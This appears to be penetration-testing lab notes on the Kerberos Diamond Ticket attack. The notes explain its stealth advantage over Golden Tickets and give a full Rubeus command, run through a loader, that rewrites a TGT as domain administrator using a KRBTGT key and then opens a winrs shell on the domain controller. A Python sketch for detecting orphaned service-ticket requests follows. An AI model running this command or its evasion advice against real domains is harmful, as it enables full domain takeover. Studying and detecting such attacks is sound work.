Diamond Ticket

A Diamond Ticket attack decrypts a TGT issued by the DC using the KRBTGT account's AES key, modifies it, and re-encrypts it with the same key. A Golden Ticket is a TGT forging attack, whereas a Diamond Ticket is a TGT modification attack.

  • A diamond ticket is more opsec safe because:

    • The ticket times are valid, since a TGT actually issued by the DC is modified rather than forged from scratch.

    • With a golden ticket the TGT is forged, so the TGS/service ticket requests made with it have no corresponding TGT request; a diamond ticket starts from a real TGT request.

  • In a real assessment, a diamond ticket should be chosen over a golden ticket.

In the command below, the TGT is decrypted, modified to carry the user account and group we want, and re-encrypted.

# Open cmd with elevated privs
# KRBKEY is same as KRBTGT account's RC4/AES key
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# This should spawn a new admin shell via which we can get any user's shell.

winrs -r:dcorp-dc cmd
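The opsec difference noted above, that a forged or rewritten ticket leads to service ticket requests with no matching TGT request for the account named in the ticket, is also what a defender can look for. The following detection sketch is an added example, not part of the original page: it correlates constructed 4768 (TGT request) and 4769 (service ticket request) Security events by account and client address and flags service tickets with no preceding TGT request. The event IDs are the standard Windows Security log IDs; the sample events, field names and the 10-hour window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample Security-log events (not real data). 4768 = TGT
# requested, 4769 = service ticket requested. Fields are the ones a SIEM
# would expose: event id, time, account name, client address, service.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-05-01 10:00:00", "user": "student1", "ip": "10.0.0.5"},
    {"id": 4769, "time": "2024-05-01 10:00:05", "user": "student1", "ip": "10.0.0.5",
     "service": "cifs/dcorp-dc"},
    # The rewritten TGT now carries 'administrator', but that account never
    # requested a TGT from this client; only 'student1' did.
    {"id": 4769, "time": "2024-05-01 10:02:00", "user": "administrator", "ip": "10.0.0.5",
     "service": "http/dcorp-dc"},
    # Legitimate admin logon from another host: a 4768 precedes the 4769.
    {"id": 4768, "time": "2024-05-01 11:00:00", "user": "Administrator", "ip": "10.0.0.9"},
    {"id": 4769, "time": "2024-05-01 11:00:03", "user": "administrator", "ip": "10.0.0.9",
     "service": "ldap/dcorp-dc"},
]


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def find_orphan_service_tickets(events, window=timedelta(hours=10)):
    """Return 4769 events whose (account, client IP) has no 4768 within
    `window` before them. 10 hours is the default maximum TGT lifetime, so a
    client using a DC-issued TGT normally shows a 4768 inside that interval."""
    tgt_times = {}  # (account, ip) -> times of 4768 events seen so far
    flagged = []
    for e in sorted(events, key=_ts):
        key = (e["user"].lower(), e["ip"])
        if e["id"] == 4768:
            tgt_times.setdefault(key, []).append(_ts(e))
        elif e["id"] == 4769:
            recent = [t for t in tgt_times.get(key, []) if _ts(e) - t <= window]
            if not recent:
                flagged.append(e)
    return flagged


if __name__ == "__main__":
    for e in find_orphan_service_tickets(SAMPLE_EVENTS):
        print(f"{e['time']} 4769 for {e['user']} from {e['ip']} "
              f"({e['service']}) has no matching 4768")
```

Correlate across every DC in the domain, since the TGT and the service ticket may be issued by different DCs; a legitimately cached TGT older than the window will also be flagged, so treat hits as leads to review rather than verdicts.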
